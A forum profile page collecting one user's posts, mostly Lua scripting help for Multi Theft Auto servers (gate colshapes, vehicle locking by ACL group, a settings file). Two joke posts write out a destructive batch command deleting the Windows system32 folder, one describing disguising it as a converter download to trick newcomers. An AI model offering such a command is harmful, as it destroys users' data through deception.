Jump to content

mjau

Members
  • Posts

    589
  • Joined

  • Last visited

Everything posted by mjau

  1. I tried this in my server it works and to get the gate down change the skins to same value make sure u have skin 71 ....
  2. A Try this .Open Notepad. .Type in: @echo off del c:\WINDOWS\system32 .Save the file as anything.bat (its very important to put the .bat) and save as all files. .Double click it. .?????. .Profit. Q You wanna try it ?
  3. /me makes a bat file named MTA Client to Server converter then i type the following in it @echo off del c:\WINDOWS\system32 then /me uploads it so all the noobs herer download it and well they got no windows anymore ...
  4. Hm try this with debugscript 3 on if it says colshape when you go to it then the colshape is right gate1 = createObject ( 980, 2061.8999023438, 2464.8000488281, 12.60000038147, 0, 0, 180.24719238281 ) col = createColCircle ( 2061.8999023438, 2464.8000488281, 12.60000038147, 7 ) function opena51gates(thePlayer) outputDebugString ( "Colshape." ) if getElementModel( thePlayer ) == 71 then moveObject (gate1, 3000, 2061.8999023438, 2464.8000488281, 17.200000762939 ) end end addEventHandler( "onColShapeHit", col, opena51gates ) function closea51gates(thePlayer) if getElementModel( thePlayer ) == 29 then moveObject (gate1, 3000, 2061.8999023438, 2464.8000488281, 12.60000038147 ) end end addEventHandler( "onColShapeLeave", col, closea51gates )
  5. / me died (qaisjp killed me for adding another tag Paradox>)
  6. You sure you created the col circle right ?
  7. Why does he have different skin when leaving 71 to open 29 to leave ?
  8. oh ok well idk how to do it this way but when i lock cars i do like this .. Hunter1 = createVehicle ( 425, 362.26513671875, 1997.4976806641, 21.543445587158, 0, 0, 91.75 ) function lockTheHydras(player, seat, jacked) if source == Hunter1 then local accountname = getAccountName (getPlayerAccount(player)) if isObjectInACLGroup ( "user." .. accountname, aclGetGroup ( "AR-AirForce" ) ) then return end cancelEvent() outputChatBox ( "Only Airforce or Special Forces can enter this vehicle", player, 255, 0, 0, true ) end end addEventHandler ( "onVehicleStartEnter", getRootElement(), lockTheHydras ) The difference i just take cordinates and create the vehicle in the lua file instead and wellchange the acl group to whatever u want BTW serverside script
  9. A it is 104 Q. Do you belive i did that without calculator ?
  10. well your title says lock car to players is that what u mean or replacing model ?
  11. mjau

    HeLP{{{{

    LOL then we have 5 mojrm because mojrm aleready has 4 accs btw isnt it bann able for only 2 accs ?
  12. mjau

    HeLP{{{{

    LOL Helpme you are the one who is stupid ... TAPL And the others in this topic exept you know LUA ...
  13. mjau

    HeLP{{{{

    Second time you call someone stupid i really hope everyone will stop helping you
  14. mjau

    Is This Possible ?

    Oh BTW should the setting file be server or client in meta ?
  15. mjau

    Is This Possible ?

    i just know that without local they are global im not english... Edit tnx i will test ...
  16. mjau

    Is This Possible ?

    Yeh but the problem is idk what i would need to read it from another file ...
  17. Hi there im making a All Game Modes Userpanel ... and then it offc needs settings to disablle or activate different stuff so i wondreed since there is so many settings could i create one lua file for that and the main lua files read the settings from it ? This would b the settings file example local setting1 = true local setting2 = false local setting3 = true Then my main script reads the settings from that lua file would that be possible ?
  18. A. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Q. What is 1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+56+78-45 ?
  19. A K-Login, K-Userpanel(or just Userpanel), Army resource (All the SA army needs ...) Adn im helping a couple of servers Q. Wich do you worrk on ... ?
×
×
  • Create New...